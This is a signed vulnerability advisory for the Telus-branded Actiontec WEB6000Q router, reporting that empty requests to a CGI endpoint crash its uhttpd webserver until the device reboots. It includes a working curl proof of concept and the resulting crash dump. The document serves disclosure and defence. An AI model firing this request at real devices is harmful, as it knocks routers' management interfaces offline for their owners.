-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ### Device Details Discovered By: Andrew Klaus (andrew@aklaus.ca) Vendor: Actiontec (Telus Branded) Model: WEB6000Q Affected Firmware: 1.1.02.22 Reported: July 2018 CVE: Not needed since update is pushed by the provider. ### Summary of Findings By querying CGI endpoints with empty (GET/POST/HEAD) requests causes a Segmentation Fault of the uhttpd webserver. Since there is no watchdog on this daemon, a device reboot is needed to restart the webserver to make any modification to the device. ### Proof of Concept: $ curl -X POST -ik http://192.168.1.2/forgot_password.cgi curl: (52) Empty reply from server $ curl -X POST -ik http://192.168.1.2/forgot_password.cgi curl: (7) Failed to connect to 192.168.1.2 port 80: Connection refused ### UART console output after attack: <4>[ 726.578000] uhttpd/452: potentially unexpected fatal signal 11. <4>[ 726.583000] <4>[ 726.585000] Cpu 1 <4>[ 726.587000] $ 0 : 00000000 10008d00 00000000 00000000 <4>[ 726.592000] $ 4 : 00000000 00000000 00000000 00000000 <4>[ 726.598000] $ 8 : 81010100 3d3d3d3d 77a00000 f0000000 <4>[ 726.603000] $12 : 00000001 6570743a 202a2f2a 00416b5c <4>[ 726.608000] $16 : 00000000 00000000 00000000 7fe14ebe <4>[ 726.614000] $20 : 00404c84 775168a0 0046d470 0084ee6c <4>[ 726.619000] $24 : 00000186 00411030 <4>[ 726.624000] $28 : 00464620 7fe12800 7fe12800 00416c20 <4>[ 726.630000] Hi : 000000c9 <4>[ 726.633000] Lo : 0001e791 <4>[ 726.636000] epc : 00411078 0x411078 <4>[ 726.640000] Tainted: P <4>[ 726.643000] ra : 00416c20 0x416c20 <4>[ 726.647000] Status: 00008d13 USER EXL IE <4>[ 726.652000] Cause : 00000008 <4>[ 726.655000] BadVA : 00000000 <4>[ 726.657000] PrId : 0002a080 (Broadcom BMIPS4350) <4>[ 726.663000] <4>[ 726.663000] Userspace Call Trace: process uhttpd, pid 452, signal 11 <4>[ 726.671000] [<00411078>] /sbin/uhttpd <4>[ 726.674000] [<00416c20>] /sbin/uhttpd <4>[ 726.678000] [<00416d68>] /sbin/uhttpd <4>[ 726.682000] [<00407cd4>] /sbin/uhttpd <4>[ 726.686000] [<00416c20>] /sbin/uhttpd <4>[ 726.689000] [<0047cb94>] (unknown) -----BEGIN PGP SIGNATURE----- iQIzBAEBCAAdFiEE/rRUDraOzqmrp8tZoyRid8jQfpkFAlz9T/cACgkQoyRid8jQ fpl0pQ/8Cy5KVRr9A21pitkXvN4tfSg2xLW3JPCM5u9YTVyat8/OXBJH4fFro0qg lu47mquRCKEC98IqMfHDiiq7x75iAWTfGOtB3k9Kk4xfdtwdQP8yKy8do8dHr9No FgmNh0+MFK0fvEju5hyzDDU7jBIAKAcjxQGU974B96ai+7p5yjm0rziwMVRK10UA Bfc7kIZVAKTxvJkVtThBihkJ2+Szq33j+DwC1F64ePx++SZIJO+sHMY28MU/Kzdb BmUUfhPQhla0pSZ1S1TTcOzNE+j7YrvQZ8mJ8fVJ7c/tOkG1u7xN/i8DpikF/46Z nlmERr5wqRHvpsPsrmjEJPOnECRhcK9GRAlxiZJIXExzRv94hwJnGAMVXBqNw/81 GHhwnXW7efQpPNiuV9P9GnNiBuTL5I+eQR6aJn5rMl+h9em8+6YyU6Aguf+z5UJC eBsaTRHIl6PReTCaBbZR7lOG2KqP485LM7bwDSFej0lRWStmrB624O48Qqr6wbDf UW639RG4J7J1Qtoc+Gu8PgXcXWV9HY4KH1Edt4cSowveOn1LmQEsmFOeoBC5FKbQ bIqB1uYTTjmO/ey/ysh2GbXkNym6xNJYa1RCZt+S0T0T/qPjPQa+IVO59lygQhtm GHNRPP43+TkLyXhvWMjl4Ptat2b/gd99DMqO/VnLqrZEWD2rXx8= =IEzI -----END PGP SIGNATURE-----